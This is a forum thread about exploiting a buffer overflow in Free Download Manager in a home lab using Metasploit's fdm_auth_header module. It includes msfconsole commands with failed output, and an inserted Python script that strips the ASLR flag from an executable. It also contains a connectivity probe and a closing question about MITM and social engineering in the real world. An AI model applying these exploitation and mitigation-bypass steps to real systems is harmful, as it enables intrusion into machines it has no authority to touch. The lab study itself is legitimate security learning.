
Thread: Playing with Free Download Manager Remote Control Server Buffer Overflow

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Playing with Free Download Manager Remote Control Server Buffer Overflow

    As I have a fully patched Vista box, I was trying to make it vulnerable. My idea was to install Free Download Manager 2.5 Build 758 on it, so that I can exploit it from my BT3/BT4b box. Obviously, I am using the fdm_auth_header exploit. As payload, I'm happy to get a shell, although a meterpreter session is preferred. I tried several payloads including meterpreter, reverse meterpreter and bind tcp, but no luck yet. So, just wondering whether anyone has better experience... Thanks a lot for your time.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281


    Maybe go for a different exploit? Or try it out on an XP box and see if you have issues with the exploit itself or if there might be an issue with Vista.
    Tiocfaidh ár lá

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Thanks, KMDave, for the reply. I think fdm_auth_header is the exploit that should work against the download manager. This one clearly says that "This module exploits a stack overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code."

    I'll try another time tonight with Vista, after disabling AV & firewall.

    At this moment, I don't have an XP box with me... If someone has a go with XP, that will be great. Any newbie? PM me please if interested, I'll guide you through. Cheers guys
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Good friend of the forums
    Join Date
    Feb 2009
    Posts
    356


    Remember Vista has Address Space Layout Randomization, and if it's enabled in FDM you're screwed... You can disable it in the exe of FDM with a hex editor; it's a simple change (I don't remember the address, but you can research the topic).
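    The "simple change" the post above refers to is a single bit: Vista only randomizes an image's base address when the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag (0x0040) is set in the DllCharacteristics field of the PE optional header. The script below is an added example, not code from this thread, from FDM, or from the Metasploit module: it walks the PE headers to locate that field, reports whether the flag is set, and returns a copy with it cleared, which is exactly what the hex-editor change does. The fdm.exe layout is not reproduced here; the image it runs against is a constructed minimal PE32 header standing in for any real executable, and a real file is handled the same way (read it, pass the bytes in, write the result out).

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits as defined in winnt.h
DYNAMIC_BASE = 0x0040   # image may be relocated at load time (ASLR opt-in)
NX_COMPAT = 0x0100      # image is DEP-compatible


def dll_characteristics_offset(pe: bytes) -> int:
    """Return the file offset of the 16-bit DllCharacteristics field.

    Walks MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> optional header.
    DllCharacteristics sits 70 bytes into the optional header for both
    PE32 (magic 0x10b) and PE32+ (magic 0x20b).
    """
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if size_of_optional < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    return opt + 70


def get_dll_characteristics(pe: bytes) -> int:
    (value,) = struct.unpack_from("<H", pe, dll_characteristics_offset(pe))
    return value


def has_dynamic_base(pe: bytes) -> bool:
    """True if the loader is allowed to randomize this image's base (ASLR)."""
    return bool(get_dll_characteristics(pe) & DYNAMIC_BASE)


def clear_dynamic_base(pe: bytes) -> bytes:
    """Return a copy of the image with DYNAMICBASE cleared: the hex-editor change."""
    off = dll_characteristics_offset(pe)
    buf = bytearray(pe)
    value = struct.unpack_from("<H", buf, off)[0] & ~DYNAMIC_BASE & 0xFFFF
    struct.pack_into("<H", buf, off, value)
    return bytes(buf)


def build_sample_pe(dll_characteristics: int) -> bytes:
    """Constructed minimal PE32 header (no sections) used as a stand-in for fdm.exe."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)     # e_lfanew: PE header follows the DOS header
    # Machine i386, 0 sections, no timestamp/symbols, 224-byte PE32 optional header,
    # Characteristics EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<H", opt, 68, 2)         # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # For a real file: image = open("fdm.exe", "rb").read(); write clear_dynamic_base(image) back.
    image = build_sample_pe(DYNAMIC_BASE | NX_COMPAT)
    print("before: DllCharacteristics=0x%04x ASLR opt-in=%s"
          % (get_dll_characteristics(image), has_dynamic_base(image)))
    patched = clear_dynamic_base(image)
    print("after:  DllCharacteristics=0x%04x ASLR opt-in=%s"
          % (get_dll_characteristics(patched), has_dynamic_base(patched)))
```

    Two caveats before relying on this. First, clearing the bit only pins fdm.exe itself; Vista still randomizes the system DLLs (kernel32, ntdll, ...) once per boot, so if the module's return address points into one of those, this change does not help. Second, check the flag before editing anything: a build from 2009 may never have been linked with /DYNAMICBASE, in which case it was not being randomized in the first place and the problem lies elsewhere. The PE CheckSum field is not verified for user-mode executables, so no checksum fix-up is needed after flipping the bit.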

  5. #5
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Update: Tried with Vista, after disabling AV & firewall - nothing happens. A Nessus scan doesn't find any vulnerability either.

    Update 2: Managed to get hold of an XP box (unpatched), will try there.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Now I'm really stuck, I must be missing something completely. Note that there is no service pack installed on the XP box. Free Download Manager 2.5 Build 758 is running on the box; here is the nmap output from the attacker (BT4b):
    root@bt:~# nmap -sV -O 192.168.1.5

    Starting Nmap 4.68 ( http://nmap.org ) at 2009-05-26 18:16 EDT
    Interesting ports on 192.168.1.5:
    Not shown: 1712 closed ports
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    1025/tcp open msrpc Microsoft Windows RPC
    5000/tcp open upnp Microsoft Windows UPnP
    MAC Address: 00:1F:1F:08:8E:AE (Edimax Technology Co.)
    Device type: general purpose
    Running: Microsoft Windows 2000
    OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2
    Network Distance: 1 hop
    Service Info: OS: Windows

    Host script results:
    |_ Discover OS Version over NetBIOS and SMB: Windows XP

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds
    Here is the unsuccessful exploitation:
    msf > use windows/http/fdm_auth_header
    msf exploit(fdm_auth_header) > set payload windows/shell/bind_tcp
    payload => windows/shell/bind_tcp
    msf exploit(fdm_auth_header) > set rhost 192.168.1.5
    rhost => 192.168.1.5
    msf exploit(fdm_auth_header) > exploit
    [*] Trying target Free Download Manager 2.5 Build 758...
    [*] Started bind handler
    [-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).
    [*] Exploit completed, but no session was created.
    Tried the meterpreter payload:
    msf exploit(fdm_auth_header) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf exploit(fdm_auth_header) > exploit
    [*] Trying target Free Download Manager 2.5 Build 758...
    [*] Started bind handler
    [-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).
    [*] Exploit completed, but no session was created.
    Any idea? What I can see is that port 80 is not open.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein
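    The failure in the post above happens before any exploit data is sent: "connection was refused by the remote host (192.168.1.5:80)" means the TCP connect itself was rejected, which is also why nmap lists no port 80. The module attacks the Remote Control server component, sending it the Authorization header quoted in post #3, so that server has to be listening. The assumption here (check FDM's options dialog) is that the Remote Control HTTP server is only started once it is switched on in FDM's settings, on a port you pick there. The script below is an added example, not code from this thread or from the Metasploit module: it sends one harmless GET with an ordinary Basic Authorization header, no overflow, and classifies the answer so you can tell "nothing listening" from "listening but rejecting my credentials" before blaming the payload. The target that ships with it is a constructed stand-in HTTP server on loopback, not the real FDM server.

```python
import base64
import binascii
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def probe_remote_control(host, port, user="", password="", timeout=3.0):
    """Say what, if anything, answers at host:port. States returned:
    refused  - TCP connect rejected: nothing listening (server not enabled,
               wrong port, or a firewall answering with RST)
    timeout  - no answer at all: host down or packets silently dropped
    not-http - something accepted the connection but did not speak HTTP
    http     - an HTTP server answered; 'status' and 'server' are filled in
    """
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except ConnectionRefusedError:
        return {"state": "refused"}
    except OSError as exc:                      # socket.timeout is an OSError
        return {"state": "timeout", "error": str(exc)}
    # Plain Basic auth header: the same header fdm_auth_header abuses, harmless value.
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    request = (f"GET / HTTP/1.0\r\nHost: {host}\r\n"
               f"Authorization: Basic {token}\r\n\r\n").encode()
    try:
        sock.settimeout(timeout)
        sock.sendall(request)
        banner = sock.recv(4096)
    except OSError as exc:
        return {"state": "not-http", "error": str(exc)}
    finally:
        sock.close()
    if not banner.startswith(b"HTTP/"):
        return {"state": "not-http", "banner": banner[:64]}
    lines = banner.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2 or not parts[1].isdigit():
        return {"state": "not-http", "banner": banner[:64]}
    server = next((l.split(":", 1)[1].strip() for l in lines[1:]
                   if l.lower().startswith("server:")), "")
    return {"state": "http", "status": int(parts[1]), "server": server}


class _StandInHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the Remote Control server (NOT the real FDM code):
    answers 200 when the Basic credentials match, 401 otherwise."""
    expected = ""                                # "user:password", set per instance below

    def version_string(self):                    # value of the Server: header
        return "FDM-stand-in (constructed)"

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        supplied = ""
        if auth.startswith("Basic "):
            try:
                supplied = base64.b64decode(auth[6:]).decode(errors="replace")
            except binascii.Error:
                supplied = ""
        if supplied == self.expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"ok\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="FDM"')
            self.end_headers()

    def log_message(self, *args):                # keep the probe output clean
        pass


def start_stand_in_server(user, password):
    """Start the stand-in on 127.0.0.1 at an ephemeral port; returns (server, port)."""
    handler = type("Handler", (_StandInHandler,), {"expected": f"{user}:{password}"})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def closed_local_port():
    """Pick a loopback port nothing is listening on (bind, read the number, release)."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    srv, port = start_stand_in_server("admin", "secret")
    print("nothing listening:", probe_remote_control("127.0.0.1", closed_local_port()))
    print("wrong password:   ", probe_remote_control("127.0.0.1", port, "admin", "nope"))
    print("right password:   ", probe_remote_control("127.0.0.1", port, "admin", "secret"))
    srv.shutdown()
    srv.server_close()
    # Against the lab target from the thread: probe_remote_control("192.168.1.5", 80)
```

    Run the probe against the lab box after enabling Remote Control in FDM: a "refused" result means the module will keep failing at connect no matter which payload is selected, and the thing to fix is the service, its port, or the firewall, not the payload.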

  7. #7
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281


    Maybe the download manager has to download the file from the attacking machine? It won't sit and listen for incoming connections usually.

    It is the same as with for instance the Quicktime exploit. The victim has to open a specific file or URL in order for an exploit to be sent to him.
    Tiocfaidh ár lá

  8. #8
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    So, should I use a MITM attack & SE (I mean, if it were the real world) to make the XP box download something from the attacker?
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein
